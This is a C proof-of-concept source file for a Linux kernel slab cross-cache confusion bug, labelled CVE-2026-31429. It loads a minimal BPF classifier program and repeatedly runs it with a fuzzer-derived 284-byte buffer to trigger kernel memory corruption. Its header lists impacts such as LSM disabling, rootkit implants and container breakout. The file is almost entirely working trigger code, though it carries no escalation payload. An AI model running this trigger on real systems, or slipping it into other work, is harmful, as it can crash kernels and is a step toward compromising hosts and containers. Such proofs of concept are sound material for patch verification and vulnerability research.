/* POC for CVE-2026-31429 Linux Kernel >= 6.3 < 6.12.82 Slab Cross-Cache Confusion Vulnerability Discovered by Antonius w1sdom - bluedragonsec.com gcc -O2 -o cve-2026-31429-poc-only cve-2026-31429-poc-only.c might require root privilege ! related security impacts : - mitigation bypass - disabling LSM - kernel rootkit implants - container breakout - denial of service */ #define _GNU_SOURCE #include #include #include #include #include #include #include #ifndef __NR_bpf #define __NR_bpf 321 #endif /* BPF insns: ld_imm64(r0,0) + exit — 3 insns = 24 bytes */ static uint8_t bpf_prog_bytes[] = { 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; static uint8_t syz_data[284] = { 0x60,0xdc,0x24,0x19,0xdd,0x5e,0x95,0xd4,0x73,0x79,0xd5,0x04,0xef,0x23,0xc1,0x79, 0x45,0x52,0xaa,0x7b,0x7d,0x1d,0x56,0xfa,0xba,0x28,0x2e,0x46,0xc9,0x45,0x81,0x3d, 0x60,0x90,0xa3,0x11,0x47,0xc0,0x7f,0x95,0xf2,0x71,0x69,0xcb,0x54,0xbe,0x67,0x59, 0x79,0x28,0x85,0xcb,0x60,0xfa,0x32,0x80,0x61,0xa0,0xc9,0x05,0xc3,0xaa,0x1e,0x4c, 0x7b,0x82,0xf5,0x74,0x69,0x25,0x10,0x83,0xa0,0x12,0x8e,0x50,0xde,0xb0,0x10,0x72, 0xd9,0xc4,0x7a,0x94,0xca,0x02,0xb3,0xf7,0x4a,0xf9,0xba,0xcf,0xb5,0xf7,0x06,0x13, 0x36,0x1b,0x48,0x01,0xbe,0xd2,0x6b,0x41,0x30,0xf9,0x68,0x1e,0xd2,0xa7,0xc6,0x93, 0xff,0x8e,0xd1,0xea,0xf8,0x20,0xc0,0x60,0x13,0x33,0xe5,0xed,0x3f,0xd2,0xdc,0x8a, 0x5d,0xea,0xbe,0xeb,0x37,0xaf,0x12,0x0a,0x72,0xe5,0x00,0x8f,0xea,0xf8,0xae,0x0f, 0x59,0x9d,0xc1,0x86,0xc5,0xd5,0x8c,0x54,0x4a,0x1e,0xc8,0x83,0xf4,0xbc,0x04,0x6e, 0xd9,0x7a,0xf6,0x39,0x06,0xc0,0x12,0xab,0x0b,0xa6,0xa6,0x6e,0x06,0xcc,0x06,0x17, 0x78,0xe5,0x95,0x13,0x1c,0x15,0xcd,0xdf,0x7c,0x57,0x75,0xe3,0xaa,0x3d,0x8a,0x14, 0x13,0x97,0xed,0x95,0x93,0x90,0x27,0x81,0xf2,0xa1,0x64,0x32,0x5f,0x30,0x4c,0xba, 0x56,0x6f,0xa5,0x7e,0xef,0xff,0xa7,0x9e,0xa5,0xbb,0x08,0x71,0xd9,0x9f,0x3e,0xbb, 0x4c,0x46,0xed,0x51,0xc9,0x55,0x2b,0xda,0x25,0xa8,0x12,0x85,0xdc,0x0b,0x06,0x4a, 0xa7,0xfc,0xfb,0x00,0xf7,0x8a,0x33,0x24,0x8e,0x4d,0xf8,0x87,0xf2,0xe6,0x09,0x5c, 0x05,0xc9,0x97,0x20,0x96,0x66,0xf9,0xb5,0xad,0x2f,0xed,0x68,0x41,0xfa,0xb9,0x93, 0x28,0x88,0x5b,0x45,0x5e,0x61,0x6f,0x62,0x94,0xaa,0x17,0x68, }; static int bpf_load(void) { uint8_t attr[0x94]; memset(attr, 0, sizeof(attr)); *(uint32_t*)(attr+0x00) = 3; /* SCHED_CLS */ *(uint32_t*)(attr+0x04) = 3; /* insn_cnt */ *(uint64_t*)(attr+0x08) = (uint64_t)bpf_prog_bytes; *(uint64_t*)(attr+0x10) = (uint64_t)"GPL"; return (int)syscall(__NR_bpf, 5, attr, 0x94); } static long bpf_run(int fd, void *data, uint32_t sz, uint32_t repeat, uint32_t flags) { uint8_t attr[0x50]; memset(attr, 0, sizeof(attr)); *(uint32_t*)(attr+0x00) = (uint32_t)fd; *(uint32_t*)(attr+0x08) = sz; *(uint64_t*)(attr+0x10) = (uint64_t)data; *(uint32_t*)(attr+0x20) = repeat; *(uint32_t*)(attr+0x40) = flags; /* BPF_F_TEST_RUN_ON_CPU = 4 */ *(uint32_t*)(attr+0x44) = 0; /* cpu = 0 */ return syscall(__NR_bpf, 10, attr, 0x50); } int main(void) { printf("repro2 — warn_free_bad_obj (syzkaller exact data)\n"); printf("uid=%d euid=%d\n", getuid(), geteuid()); /* Setup mmap persis seperti syzkaller */ syscall(__NR_mmap, 0x1ffffffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul); syscall(__NR_mmap, 0x200000000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul); syscall(__NR_mmap, 0x200001000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul); int fd = bpf_load(); if (fd < 0) { printf("[-] BPF_PROG_LOAD: %s\n", strerror(errno)); return 1; } printf("[+] prog fd=%d\n", fd); printf("[*] Trigger: syz_data=284B flags=4 repeat=4\n"); long ret = bpf_run(fd, syz_data, 284, 4, 4); printf("[*] ret=%ld\n", ret); /* Loop untuk reliability */ for (int i = 0; i < 50; i++) bpf_run(fd, syz_data, 284, 4, 4); printf("[+] Done — cek: dmesg | grep warn_free\n"); close(fd); return 0; }